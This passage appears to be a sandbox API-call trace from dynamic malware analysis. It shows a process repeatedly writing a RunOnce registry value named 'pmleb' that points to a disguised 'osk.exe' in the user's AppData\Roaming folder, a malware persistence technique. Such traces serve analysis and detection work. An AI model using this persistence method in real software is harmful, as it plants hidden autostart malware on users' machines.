Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.356] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.357] RegCloseKey (hKey=0x280) returned 0x0 [0084.357] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.357] SetTimer (hWnd=0x20280, nIDEvent=0x2167, uElapse=0xa, lpTimerFunc=0x0) returned 0x2167 [0084.357] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.371] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.371] KillTimer (hWnd=0x20280, uIDEvent=0x2167) returned 1 [0084.371] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.371] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.372] RegCloseKey (hKey=0x280) returned 0x0 [0084.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.372] SetTimer (hWnd=0x20280, nIDEvent=0x2168, uElapse=0xa, lpTimerFunc=0x0) returned 0x2168 [0084.372] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.386] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.386] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.386] KillTimer (hWnd=0x20280, uIDEvent=0x2168) returned 1 [0084.387] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.387] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.387] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.387] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.388] RegCloseKey (hKey=0x280) returned 0x0 [0084.388] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.388] SetTimer (hWnd=0x20280, nIDEvent=0x2169, uElapse=0xa, lpTimerFunc=0x0) returned 0x2169 [0084.388] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.402] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.402] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.402] KillTimer (hWnd=0x20280, uIDEvent=0x2169) returned 1 [0084.402] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.403] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.403] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.403] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.403] RegCloseKey (hKey=0x280) returned 0x0 [0084.403] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.403] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.403] SetTimer (hWnd=0x20280, nIDEvent=0x216a, uElapse=0xa, lpTimerFunc=0x0) returned 0x216a [0084.403] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.418] KillTimer (hWnd=0x20280, uIDEvent=0x216a) returned 1 [0084.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.419] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.419] RegCloseKey (hKey=0x280) returned 0x0 [0084.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.419] SetTimer (hWnd=0x20280, nIDEvent=0x216b, uElapse=0xa, lpTimerFunc=0x0) returned 0x216b [0084.419] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.435] KillTimer (hWnd=0x20280, uIDEvent=0x216b) returned 1 [0084.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.435] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.435] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.436] RegCloseKey (hKey=0x280) returned 0x0 [0084.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.436] SetTimer (hWnd=0x20280, nIDEvent=0x216c, uElapse=0xa, lpTimerFunc=0x0) returned 0x216c [0084.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.448] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.448] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.449] KillTimer (hWnd=0x20280, uIDEvent=0x216c) returned 1 [0084.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.449] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.449] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.450] RegCloseKey (hKey=0x280) returned 0x0 [0084.450] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.450] SetTimer (hWnd=0x20280, nIDEvent=0x216d, uElapse=0xa, lpTimerFunc=0x0) returned 0x216d [0084.450] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.464] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.464] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.464] KillTimer (hWnd=0x20280, uIDEvent=0x216d) returned 1 [0084.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.465] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.465] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.465] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.465] RegCloseKey (hKey=0x280) returned 0x0 [0084.465] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.465] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.465] SetTimer (hWnd=0x20280, nIDEvent=0x216e, uElapse=0xa, lpTimerFunc=0x0) returned 0x216e [0084.465] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.486] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.487] KillTimer (hWnd=0x20280, uIDEvent=0x216e) returned 1 [0084.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.487] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.488] RegCloseKey (hKey=0x280) returned 0x0 [0084.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.488] SetTimer (hWnd=0x20280, nIDEvent=0x216f, uElapse=0xa, lpTimerFunc=0x0) returned 0x216f [0084.488] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.495] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.495] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.495] KillTimer (hWnd=0x20280, uIDEvent=0x216f) returned 1 [0084.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.496] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.496] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.496] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.496] RegCloseKey (hKey=0x280) returned 0x0 [0084.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.497] SetTimer (hWnd=0x20280, nIDEvent=0x2170, uElapse=0xa, lpTimerFunc=0x0) returned 0x2170 [0084.497] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.511] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.511] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.511] KillTimer (hWnd=0x20280, uIDEvent=0x2170) returned 1 [0084.511] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.512] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.512] RegCloseKey (hKey=0x280) returned 0x0 [0084.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.512] SetTimer (hWnd=0x20280, nIDEvent=0x2171, uElapse=0xa, lpTimerFunc=0x0) returned 0x2171 [0084.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.527] KillTimer (hWnd=0x20280, uIDEvent=0x2171) returned 1 [0084.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.528] RegCloseKey (hKey=0x280) returned 0x0 [0084.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.528] SetTimer (hWnd=0x20280, nIDEvent=0x2172, uElapse=0xa, lpTimerFunc=0x0) returned 0x2172 [0084.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.542] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.542] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.542] KillTimer (hWnd=0x20280, uIDEvent=0x2172) returned 1 [0084.542] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.543] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.543] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.543] RegCloseKey (hKey=0x280) returned 0x0 [0084.543] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.543] SetTimer (hWnd=0x20280, nIDEvent=0x2173, uElapse=0xa, lpTimerFunc=0x0) returned 0x2173 [0084.543] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.569] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.569] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.569] KillTimer (hWnd=0x20280, uIDEvent=0x2173) returned 1 [0084.569] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.570] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.570] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.570] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.570] RegCloseKey (hKey=0x280) returned 0x0 [0084.570] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.570] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.570] SetTimer (hWnd=0x20280, nIDEvent=0x2174, uElapse=0xa, lpTimerFunc=0x0) returned 0x2174 [0084.570] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.573] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.573] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.573] KillTimer (hWnd=0x20280, uIDEvent=0x2174) returned 1 [0084.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.574] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.574] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.574] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.574] RegCloseKey (hKey=0x280) returned 0x0 [0084.574] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.574] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.574] SetTimer (hWnd=0x20280, nIDEvent=0x2175, uElapse=0xa, lpTimerFunc=0x0) returned 0x2175 [0084.574] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.589] KillTimer (hWnd=0x20280, uIDEvent=0x2175) returned 1 [0084.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.590] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.590] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.591] RegCloseKey (hKey=0x280) returned 0x0 [0084.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.591] SetTimer (hWnd=0x20280, nIDEvent=0x2176, uElapse=0xa, lpTimerFunc=0x0) returned 0x2176 [0084.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.604] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.604] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.605] KillTimer (hWnd=0x20280, uIDEvent=0x2176) returned 1 [0084.605] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.605] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.605] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.606] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.606] RegCloseKey (hKey=0x280) returned 0x0 [0084.606] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.606] SetTimer (hWnd=0x20280, nIDEvent=0x2177, uElapse=0xa, lpTimerFunc=0x0) returned 0x2177 [0084.606] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.620] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.620] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.620] KillTimer (hWnd=0x20280, uIDEvent=0x2177) returned 1 [0084.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.621] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.621] RegCloseKey (hKey=0x280) returned 0x0 [0084.621] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.621] SetTimer (hWnd=0x20280, nIDEvent=0x2178, uElapse=0xa, lpTimerFunc=0x0) returned 0x2178 [0084.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.636] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.636] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.637] KillTimer (hWnd=0x20280, uIDEvent=0x2178) returned 1 [0084.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.637] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.637] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.638] RegCloseKey (hKey=0x280) returned 0x0 [0084.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.638] SetTimer (hWnd=0x20280, nIDEvent=0x2179, uElapse=0xa, lpTimerFunc=0x0) returned 0x2179 [0084.638] GetMessageW 